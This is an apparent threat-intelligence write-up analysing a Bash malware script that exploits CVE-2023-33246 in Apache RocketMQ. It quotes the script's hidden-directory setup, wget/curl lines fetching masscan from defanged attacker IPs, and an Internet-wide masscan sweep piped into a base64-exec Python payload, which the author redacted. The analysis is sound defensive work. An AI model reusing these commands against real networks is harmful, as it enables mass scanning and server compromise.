A few months ago, RocketMQ[1], a real-time message queue platform, suffered of a nasty vulnerability referred as CVE-2023-33246. I found another malicious script in the wild a few weeks ago that exploits this vulnerability. It has still today a very low VirusTotal detection score:2/60 [2] (SHA256:70710c630390dbf74a97162ab61aae78d3e18eacb41e16d3dd6bbd872fee66c5).
This script is a Bash script has two main parts: First, it will prepare its environment by creating a random directory:
rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; ${rm} -f "$(pwd)/.${rand}" >/dev/null 2>&1 echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; ${rm} -f "/tmp/.${rand}" >/dev/null 2>&1 echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; ${rm} -f "/usr/local/bin/.${rand}" >/dev/null 2>&1 echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; ${rm} -f "${HOME}/.${rand}" >/dev/null 2>&1 mkdir -p ${LPATH} >/dev/null 2>&1
Then, it will install some dependencies using yum or apt. The dependencies will allow the tool to download and compile on the fly a copy of the masscan[3] port scanner:
if [ ! -d ${LPATH}masscan ]; then echo "Downloading masscan.tar.gz.." wget -qO ${LPATH}masscan.tar.gz hxxp://149[.]28[.]85[.]17:80/wp-content/themes/twentyseventeen/masscan.tar.gz tar -C ${LPATH} -zxf ${LPATH}masscan.tar.gz rm ${LPATH}masscan.tar.gz make clean -C ${LPATH}masscan >/dev/null 2>&1 make -C ${LPATH}masscan >/dev/null 2>&1 masscan=${LPATH}masscan/bin/masscan elif [ -f ${LPATH}masscan/bin/masscan ]; then echo "Masscan existed already in ${LPATH}" masscan=${LPATH}masscan/bin/masscan else if [ ! -f ${LPATH}.masscan ]; then curl --retry 5 -sLk hxxp://203[.]55[.]135[.]12/wp-content/themes/twentyfifteen/masscan -o ${LPATH}.masscan chmod 755 ${LPATH}.masscan masscan=${LPATH}.masscan fi if [[ "" == "${masscan}" ]]; then exit fi fi
Masscan is very powerfull to quickly scan the complete IPv4 address space for a specific port. That's what the script does. It scan the Internet and searches for the following open ports: 10911,10909. These are used by RocketMQ. The masscan results will be passed to a Python script using a pipe:
${sudo} ${masscan} --shard 17/20 --rate 30000 --exclude-range 255.255.255.255 -p10911,10909 0.0.0.0/0 | python3 -c "import base64;exec(base64.b64decode('...redatcted...'))"
The Python script has been redacted but, for every IP reported by masscan, it starts a thread to try to exploit the server.
Something funny I found in the Python script: The attacker reused (or forked) the code because it also contains other exploits:
remnux@remnux:/MalwareZoo/20231216$ grep module_ payload.py def ZZZZmodule_scan_bigip(self, ip, port): def ZZZZmodule_scan_webmin(self, ip, port): def module_scan_rocketmq(self, ip, port): def ZZZmodule_scan_wordpress(self, ip, port): def ZZZZmodule_scan_webuzo(self, ip, port):
The one starting with "ZZZ" have been disabled.
[1] https://rocketmq.apache.org
[2] https://www.virustotal.com/gui/file/70710c630390dbf74a97162ab61aae78d3e18eacb41e16d3dd6bbd872fee66c5/detection
[3] https://github.com/robertdavidgraham/masscan
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key